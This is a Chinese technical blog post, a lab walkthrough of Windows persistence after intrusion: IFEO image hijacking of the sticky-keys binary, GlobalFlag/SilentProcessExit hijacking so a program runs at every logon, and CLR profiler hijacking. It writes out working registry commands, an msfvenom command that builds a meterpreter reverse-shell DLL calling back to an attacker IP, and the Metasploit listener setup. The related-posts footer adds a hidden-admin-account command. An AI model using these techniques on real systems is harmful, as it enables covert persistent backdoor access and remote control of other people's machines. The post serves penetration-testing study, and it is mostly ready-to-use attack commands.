内网权限维持——映像劫持&CLR劫持

于 2024-08-04 12:03:42 发布
阅读量411 收藏 5
点赞数 8
分类专栏: 内网渗透 文章标签: 网络安全 系统安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140895624
版权

文章目录


在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

一、映像劫持

1.1 IFEO简介

IFEO(Image File Execution Options,镜像文件执行选项)是windows系统的一个注册表项,路径为HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options。在windows NT系统中,IFEO原本是为一些在默认系统环境中允许是可能引发错误的程序执行体提供特殊的环境设定。利用IFEO,开发人员能够在程序运行之前执行程序所配套的环境配置程序。

简单来说,windows系统运行每个程序时,都会在HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options中查找相应的程序,如果存在,那么就会进一步查找是否存在Debugger值,并会在程序运行时优先运行Debugger项所指定的程序。

1.2 利用Shfit后门技术进行劫持

1、在windows中按5次shfit键,就会自动执行C:\Windows\System32\sethc.ece,然后会弹出以下小窗口。
在这里插入图片描述
该程序就算在锁屏状态下依然可以运行并且弹出窗口。如果对sethc.exe进行映像劫持,则可以在系统锁屏后依然执行指定程序。
在这里插入图片描述

2、使用下面的命令对sethc.exe进行映像劫持

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\system32\calc.exe"

因为映像劫持的缘故,连按5下shfit键将会弹计算器。
在这里插入图片描述
要想恢复原状,将Debugger的值置空即可。

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d ""

在这里插入图片描述
3、其他辅助键

程序功能热键组合
sethc.exe粘滞键连按5次shfit
magnify.exe放大镜win + “+”
utilman.exe使用程序win + U
osk.exe屏幕键盘win + ctrl + O
displayswitch.exe屏幕拓展win + P
narrator.exe讲述者win + Ctrl +enter
atbroker.exe辅助管理工具

1.3 GlobalFlag

上述shfit后门劫持有很大一个缺点:会破坏原有程序的正常运行,导致被劫持程序无法正常打开。通过Image File Execution Options项中的GlobalFlag子项可以很好解决这一问题。通过将该项的值设置为512,可以让程序在退出后再运行指定的程序。

1、这里尝试劫持notepad.exe。运行以下命令,可以实现再notepad.exe退出后自动执行calc.exe。

# 设置GlobalFlag值为512,则被劫持的程序将会正常运行
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512

# 启用windows错误报告进程WerFault.exe,它将是calc.exe的父进程
# 在notepad.exe退出时,将运行监视器进程
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

# 指定监视器进程为calc.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "C:\Windows\System32\calc.exe"

在这里插入图片描述
劫持成功后,notepad.exe将会正常执行。当notepad.exe关闭或相关进程被杀死后,将在werfault.exe进程中创建子进程且运行calc.exe。

2、userinit.exe会在每次用户登录后自动执行,主要进行用户配置初始化工作,且这个程序是开机自启。也就是说,通过设置userinit.exe的GlobalFlag和MonitorProcess,攻击者就可以让程序在用户登录时自动运行。

# 设置GlobalFlag值为512,则被劫持的程序将会正常运行
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v GlobalFlag /t REG_DWORD /d 512

# 启用windows错误报告进程WerFault.exe,它将是calc.exe的父进程
# 在notepad.exe退出时,将运行监视器进程
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\userinit.exe" /v ReportingMode /t REG_DWORD /d 1

# 指定监视器进程为calc.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\userinit.exe" /v MonitorProcess /t REG_SZ /d "C:\Windows\System32\cmd.exe"

在这里插入图片描述
关机重启电脑,用户登录后成功弹窗。
在这里插入图片描述

二、CLR劫持

2.1 CLR简介

微软最初为了让多种高级语言能够在Windows中运行,定义了CLI(Common Language Infrastructure,通用语言基础组织的语言架构),著名的高级语言,如C#、C++、Powershell等就使用了CLI架构。CLI是一种语言架构,而实现这个架构的技术为CLR(Common Language Runtime,公共语言运行时)。CLR是.NET Framework的主要执行引擎之一,可以理解为类似于JVM的运行环境。CLR的出现是为了让各种语言适应Windows标准,而不是让windows去适应高级语言。

CLR有一个很重要的功能是通过探查器去监视程序运行状态。windows中,在CLR监视下运行的程序属于托管代码,不在CLR监视下运行而直接在裸机上运行的应用或组件属于非托管代码。探查器的主要功能是在程序执行任意函数后加入一些操作。攻击者通常向windows注册一个探查器,要求系统在执行任意.NET程序时会自动加载恶意DLL。

2.2 利用CLR探查器进行权限维持

1、在win 7上,开启CLR探查功能。

SETX COR_ENABLE_PROFILING 1 /M

# 权限不足时使用,使用SET命令设置的环境变量为临时变量,只在当前会话中起作用
SET COR_ENABLE_PROFILING 1 /M

在这里插入图片描述

2、开启探查器后需要设置CLR所要连接的探查器,即将COR_PROFILER值设置为CLSID或ProgID,使用下面的命令连接探查器。设置CLR连接的探查器为11111111-1111-1111-1111-111111111111。权限不足,就用SET。

SETX COR_PROFILER {11111111-1111-1111-1111-111111111111} /M

在这里插入图片描述
3、给刚刚设置的CLSID(11111111-1111-1111-1111-111111111111)绑定一个DLL程序。首先在kali上使用MSF生成恶意的DLL程序,并将其放到win 7 的C:\tmp目录下。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.1 LPORT=8888 -f dll -o reverse_shell.dll

在这里插入图片描述
在这里插入图片描述

MSF设置监听:

use exploit/multi/handler # msf自带的监听模块
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.1
set lport 8888
exploit

在这里插入图片描述

在win 7注册表中添加一个新的CLSID,并将该CLSID的InProcServer32项的值设置为C:\tmp\reverse_shell.dll。根据设置,探查器会将CLSID所指向的DLL加载到所有.NET程序中。注意:32位系统和64位系统的设置方式不一样

# 32位系统设置
reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32" /VE /T REG_SZ /D "C:\tmp\reverse_shell.dll" /F # CLSID指向C:\tmp\reverse_shell.dll
reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F

# 64位系统设置
reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32" /VE /T REG_SZ /D "C:\tmp\reverse_shell.dll" /F # CLSID指向C:\tmp\reverse_shell.dll
reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
reg add "HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32" /VE /T REG_SZ /D "C:\tmp\reverse_shell.dll" /F # CLSID指向C:\tmp\reverse_shell.dll 
reg add "HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F

在这里插入图片描述
设置完成后,指向任意.NET程序,例如Powershell,执行成功后会反弹shell。
在这里插入图片描述

在这里插入图片描述

这里有一个问题,就是powershell加载恶意dll后,不能正常执行。

此外,如果目标系统存在.NET 4环境,可以直接向环境变量中添加COR_PROFILER_PATH,并设置其值位指定的DLL程序,设置完成后所有.NET程序都会被加载。

PT_silver
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-windows权限维持的方法
lza20001103的博客
08-26 1123
windows权限维持的方法 文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用
6.2. 持久化 - Windows
Sumarua的博客
07-07 1513
文章目录6.2. 持久化 - Windows6.2.1. 隐藏文件6.2.2. LOLBAS6.2.2.1. 简介6.2.2.2. 常见程序6.2.3. 后门6.2.3.1. sethc6.2.3.2. 映像劫持6.2.3.3. 定时任务6.2.3.4. 登录脚本6.2.3.5. 屏幕保护程序6.2.3.6. 隐藏用户6.2.3.7. CLR6.2.3.8. Winlogon Helper DLL后门6.2.4. UAC6.2.4.1. 简介6.2.4.2. 会触发UAC的操作6.2.4.3. ByPass
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2359
小结下权限维持方法
内网权限维持
m0_55751267的博客
11-22 1740
事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“Dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。管理员权限的后门可以设置更多的计划任务,例如重启后运行等。Run中的程序是WINDOWS初始化后才运行的,而RunService中的程序是在操作系统启动时就开始运行的,也就是说RunServices中的程序先于Run中的程序运行,如电源管理程序。反弹管理员shell。
2023史上最全Windows常见的几种权限维持
zkaqlaoniao的博客
11-20 421
映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。
Windows权限维持
2301_76786857的博客
02-07 893
作为一个攻击者,利用漏洞拿下某个服务器或者是终端的控制权限之后,需要考虑的是如何将拿下的主机当作一个据点,保证持续拥有该主机的控制权限,进而方便后续的攻击行为,如内网渗透、挖矿、勒索、持续监控等等。 当安全工程师了解或者是掌握权限维持技术后,也能更快的做出应急响应预案,进行应急处置工作,从而降低企业损失。
Windows后渗透--维持权限十九式
weixin_44155363的博客
06-15 1560
0x00:前言 维持权限后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用. 0x01:"经典的"shift后门 这个算是比较古老还比较"经典的"的隐藏方式了,这里简单讲一下,在windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能有: 1、C:\Windows\System32\sethc.exe 粘滞键,启动
2023史上最全!Windows常见的几种权限维持
2301_80115097的博客
11-20 120
Windows操作系统的组策略是配置计算机中某一些用户组策略的程序,由系统管理员操作控制计算机程序、访问网络资源、操作行为、各种软件设置的最主要工具。辅助功能提供了其他选项(屏幕键盘、放大镜、屏幕阅读),可以帮助人更轻松地使用Windows操作系统,但是此功能可能会被滥用,以在已启用RDP且已获得管理员级别权限的主机上实现持久性。
【Web安全笔记】之【6.0 内网渗透】
AA8j的博客
12-23 1251
文章目录6.0 内网渗透6.1 信息收集-Windows6.1.1 基本命令6.1.2 域信息6.1.3 用户信息6.1.4 网络信息6.1.5 防火墙6.1.6密码信息6.1.7 票据信息6.1.8 特殊文件6.1.9 其他6.2 持久化 - Windows6.2.1 隐藏文件6.2.2 LOLBAS1. 简介2. 常见程序6.2.3 后门1. sethc2. 映像劫持3. 定时任务4. 登录脚本5. 屏幕保护程序6. 隐藏用户7. CLR8. Winlogon Helper DLL后门6.2.4 UAC
C++&CLR(VS2015)编写 Windows 窗体应用程序
10-31
### C++ & CLR (VS2015) 编写 Windows 窗体应用程序 #### 知识点一:理解CLR与C++ - **CLR(Common Language Runtime)**:是.NET框架的核心组件之一,提供了执行环境,使得开发人员能够用多种编程语言编写代码,...
reportviewer2012&clrtype;
10-08
Microsoft® System CLR Types for Microsoft® SQL Server® 2012 X86和64,MICROSOFT® REPORT VIEWER 2012 RUNTIME
C++&CLR 编写 Windows 窗体应用程序
10-31
C++/CLR是Microsoft为.NET Framework提供的一种编程语言,它允许开发者利用C++的强大功能同时享受到.NET Framework的便利。 ### CLR简介 CLR(Common Language Runtime)是.NET Framework的核心组成部分,它提供了...
利用安全描述符隐藏服务后门进行权限维持1
08-03
### 利用安全描述符隐藏服务后门进行权限维持 #### 概述 在网络安全领域,权限维持是一项关键技能,特别是在渗透测试过程中。本文将详细解释如何通过修改服务的安全描述符(Security Descriptor Definition ...
CLRInsideOut.zip
06-03
《深入理解CLR Inside Out》是针对.NET Framework中的Common Language Runtime(CLR)的工具,它能够帮助开发者特别是熟悉C/C++的程序员将C/C++结构体转换为C#结构体,以便在.NET环境中进行编程。这个工具对于那些...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1679
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
24.8.2数据结构|双链表
weixin_47011416的博客
08-03 226
2个指针域、数据域2、
HC32F4A0 10路串口UART 配置
最新发布
qq_40545297的博客
08-03 254
HC32 UART 配置
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值